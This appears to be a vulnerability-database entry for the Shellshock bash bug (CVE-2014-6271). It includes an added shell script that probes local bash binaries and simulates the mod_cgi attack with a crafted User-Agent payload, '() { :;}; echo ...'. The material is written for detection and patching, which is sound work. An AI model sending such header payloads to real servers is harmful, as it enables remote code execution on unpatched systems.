CVE-2014-6271
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
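Worked check, added here and not part of the CVE record or of any vendor advisory: the first function probes a bash binary for the function-import bug described above and for the CVE-2014-7169 leftover; the second reproduces the mod_cgi vector by turning a constructed HTTP request's headers into HTTP_* environment variables the way mod_cgi does and running a one-line stand-in for a CGI script under bash. Assumes a POSIX sh with mktemp and tr; the marker strings, the sample request and the handler body are ours.

```shell
#!/bin/sh
# Added example, not from the CVE record. Assumes POSIX sh, mktemp, tr.
# Marker strings ("ss-6271-executed", "ss-cgi-executed") and the sample
# request are constructed for this demonstration.

# shellshock_status [BASH]  ->  prints: absent | vulnerable | patched
shellshock_status() {
    bash_bin="${1:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || { echo absent; return 0; }

    # CVE-2014-6271: a value beginning with "() {" is imported as a function
    # definition, and an unpatched bash also runs whatever follows the
    # closing brace while importing it, before "-c" is ever looked at.
    out="$(env x='() { :;}; echo ss-6271-executed' "$bash_bin" -c 'echo probe' 2>/dev/null || true)"
    case "$out" in *ss-6271-executed*) echo vulnerable; return 0 ;; esac

    # CVE-2014-7169 (the incomplete first fix): a malformed body leaves a
    # dangling redirection in the parser, so the "-c" text "echo date" is
    # run as "date > echo". A scratch directory keeps the stray file that a
    # vulnerable bash creates out of the caller's cwd.
    scratch="$(mktemp -d)"
    ( cd "$scratch" && env X='() { (a)=>\' "$bash_bin" -c 'echo date' >/dev/null 2>&1 ) || true
    if [ -e "$scratch/echo" ]; then
        rm -rf "$scratch"; echo vulnerable; return 0
    fi
    rm -rf "$scratch"
    echo patched
}

# Constructed request: what a client could send to a bash CGI handler.
# The User-Agent value is the classic probe payload.
SAMPLE_REQUEST='GET /cgi-bin/status.sh HTTP/1.1
Host: example.internal
User-Agent: () { :;}; echo ss-cgi-executed
Accept: */*
'

# cgi_dispatch REQUEST [BASH]
# Mirrors what mod_cgi does with request headers: each "Name: value" becomes
# an HTTP_NAME environment variable (uppercased, "-" -> "_") and the handler
# runs under bash with that environment. On a vulnerable bash the injected
# command's output appears before the Content-Type line; on a patched bash
# the header is an inert string echoed back in the body.
cgi_dispatch() {
    req="$1"; bash_bin="${2:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || { echo absent; return 0; }

    reqfile="$(mktemp)"
    printf '%s\n' "$req" > "$reqfile"
    cr="$(printf '\r')"
    set --                      # accumulate NAME=value pairs in "$@"
    first=1
    while IFS= read -r line; do
        if [ "$first" = 1 ]; then first=0; continue; fi   # skip request line
        case "$line" in *"$cr") line="${line%?}" ;; esac  # tolerate CRLF
        [ -z "$line" ] && break                             # end of headers
        name="${line%%:*}"
        value="${line#*:}"; value="${value# }"
        name="$(printf '%s' "$name" | tr 'a-z-' 'A-Z_')"
        set -- "$@" "HTTP_${name}=${value}"
    done < "$reqfile"
    rm -f "$reqfile"

    # Stand-in for the CGI script; a real one would be a file under cgi-bin.
    env "$@" "$bash_bin" -c \
        'printf "Content-Type: text/plain\n\nua=%s\n" "$HTTP_USER_AGENT"' 2>/dev/null || true
}

# Run directly: report on the bash found on PATH, then show the CGI round trip.
shellshock_status bash
cgi_dispatch "$SAMPLE_REQUEST" bash
```

Point `shellshock_status` at every bash on a host (`/bin/bash`, chrooted copies, appliance firmware), not only the one on PATH; the affected-product list below is long precisely because bash ships embedded in many images. A bash that reports `patched` still imports functions from the environment, so the durable control is to keep attacker-controlled data out of the environment of any bash that runs across a privilege boundary (CGI, sshd ForceCommand, DHCP client hooks).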
CVSS Metrics
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (base score 9.8, Critical)
Affected Products (334)
| Vendor | Product | Version |
|---|---|---|
| gnu | bash | * |
| arista | eos | * ≥ 4.9.0 < 4.9.12 |
| arista | eos | * ≥ 4.10.0 < 4.10.9 |
| arista | eos | * ≥ 4.11.0 < 4.11.11 |
| arista | eos | * ≥ 4.12.0 < 4.12.9 |
| arista | eos | * ≥ 4.13.0 < 4.13.9 |
| arista | eos | * ≥ 4.14.0 < 4.14.4f |
| oracle | linux | 4 |
| oracle | linux | 5 |
| oracle | linux | 6 |
| qnap | qts | * < 4.1.1 |
| qnap | qts | 4.1.1 |
| qnap | qts | 4.1.1 |
| mageia | mageia | 3.0 |
| mageia | mageia | 4.0 |
| redhat | gluster_storage_server_for_on-premise | 2.1 |
| redhat | virtualization | 3.4 |
| redhat | enterprise_linux | 4.0 |
| redhat | enterprise_linux | 5.0 |
| redhat | enterprise_linux | 6.0 |
…and 314 more
GitHub Security Advisory GHSA-6hfc-grwp-2p9c
GNU Bash through 4.3 processes trailing strings after function definitions in the values of...
References (341)
- http://advisories.mageia.org/MGASA-2014-0388.html Third Party Advisory
- http://archives.neohapsis.com/archives/bugtraq/2014-10/0101.html Broken Link, Third Party Advisory
- http://jvn.jp/en/jp/JVN55667175/index.html Vendor Advisory
- http://jvndb.jvn.jp/jvndb/JVNDB-2014-000126 Third Party Advisory, VDB Entry, Vendor Advisory
- http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10673 Third Party Advisory
- http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html Exploit, Issue Tracking, Third Party Advisory
- http://linux.oracle.com/errata/ELSA-2014-1293.html Third Party Advisory
- http://linux.oracle.com/errata/ELSA-2014-1294.html Third Party Advisory
- http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00028.html Mailing List, Third Party Advisory
- http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00029.html Mailing List, Third Party Advisory
- http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00034.html Mailing List, Third Party Advisory
- http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00037.html Mailing List, Third Party Advisory
- http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00040.html Mailing List, Third Party Advisory
- http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00044.html Mailing List, Third Party Advisory
- http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00049.html Mailing List, Third Party Advisory
Risk Scores
- Exploitation likelihood: top 0% (the most-likely tier, after rounding) of all scored CVEs
- CISA Known Exploited Vulnerabilities catalog: listed. Required action: apply updates per vendor instructions.